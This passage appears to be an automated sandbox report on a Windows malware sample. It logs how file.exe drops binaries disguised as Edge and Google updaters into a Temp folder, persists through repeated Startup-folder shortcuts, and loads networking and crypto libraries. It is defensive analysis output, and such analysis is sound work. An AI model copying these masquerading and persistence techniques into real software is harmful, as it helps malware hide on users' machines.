Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 15_2_04884750	15_2_04884750
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 15_2_04888B70	15_2_04888B70
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_00A01098	18_2_00A01098
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_00A09028	18_2_00A09028
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_00A0C1B8	18_2_00A0C1B8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_00A09198	18_2_00A09198
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_00A09A30	18_2_00A09A30
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_00A0C3D8	18_2_00A0C3D8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_00A0A4A8	18_2_00A0A4A8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_00A0B7B8	18_2_00A0B7B8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_00A0A0A8	18_2_00A0A0A8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_00A0108A	18_2_00A0108A
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_00A0C1A9	18_2_00A0C1A9
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_00A09187	18_2_00A09187
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_00A00AC0	18_2_00A00AC0
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_00A0A270	18_2_00A0A270
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_00A0A3C9	18_2_00A0A3C9
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_00A0BE99	18_2_00A0BE99
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_00A0DE12	18_2_00A0DE12
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_00A08FFF	18_2_00A08FFF
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_00A0DFC7	18_2_00A0DFC7
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_04AC0040	18_2_04AC0040
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_04AC2DF0	18_2_04AC2DF0
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_04AC76B0	18_2_04AC76B0
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_04AC0006	18_2_04AC0006
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_04AC85A0	18_2_04AC85A0
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_04AC858F	18_2_04AC858F
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_04AC39EF	18_2_04AC39EF
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_04AC2DE2	18_2_04AC2DE2
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_04AC6DC8	18_2_04AC6DC8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_04AC55C8	18_2_04AC55C8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_04AC4529	18_2_04AC4529
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_04AC3290	18_2_04AC3290
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_04AC3A00	18_2_04AC3A00
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_04AC4E40	18_2_04AC4E40
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_04AC2BA9	18_2_04AC2BA9
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_04AC2BB8	18_2_04AC2BB8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_04AC8B70	18_2_04AC8B70
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_04AC3748	18_2_04AC3748
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_04AC3758	18_2_04AC3758
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_04AC4750	18_2_04AC4750

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 932

Source: file.exe

Static PE information: invalid certificate

Source: file.exe, 00000000.00000002.2203991807.00000000009CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000000.00000002.2208484038.0000000008100000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLKSM.exe6 vs file.exe
Source: file.exe, 00000000.00000000.2197367988.00000000005D0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameLKSM.exe6 vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameLKSM.exe6 vs file.exe

Source: classification engine

Classification label: mal88.winEXE@13/88@6/3

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_55c2eb9fb8194b3183dae4b65fdda1b5.lnk

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3172
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6280
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess884
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6856

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\EdgeUpdater

Jump to behavior

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe	ReversingLabs: Detection: 18%
Source: file.exe	Virustotal: Detection: 23%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe"
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe" --checker
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe"
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 932
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe"
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 884 -s 932
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe"
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6856 -s 932
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe"
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6280 -s 932
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe" --checker	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Section loaded: ucrtbase_clr0400.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32

Jump to behavior

Source: LKMService_55c2eb9fb8194b3183dae4b65fdda1b5.lnk.0.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_f5a844d131a542409d15c7be5595addc.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_e473bf015e6148daa821e9cdba096597.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_513aa6e3c652483682fd1f51e46a8bd3.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_c365a14f7cc645439df5ba22b5f10906.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_38b12ffdc3054b75a4cc42355d27321a.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_6bbe8cc63bcf4ed199794d58d51e869f.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_88f655959b0548ed994a963bf2f1d4d9.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_80b58aa1ecd34f41b1ed729e00929f51.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_baaca187cd3746ad83aad8ceea07a8c5.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_385556207e4d49bb88bb33a72ac98a68.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_d827f342fe9c4f3d948a33ec240811fd.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_7e8ecf4f001c41edb4100bd58d1d004f.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_2d708224935546eb848b785f0206ad51.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_9e92297ac52847c3a122730984e5abd1.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
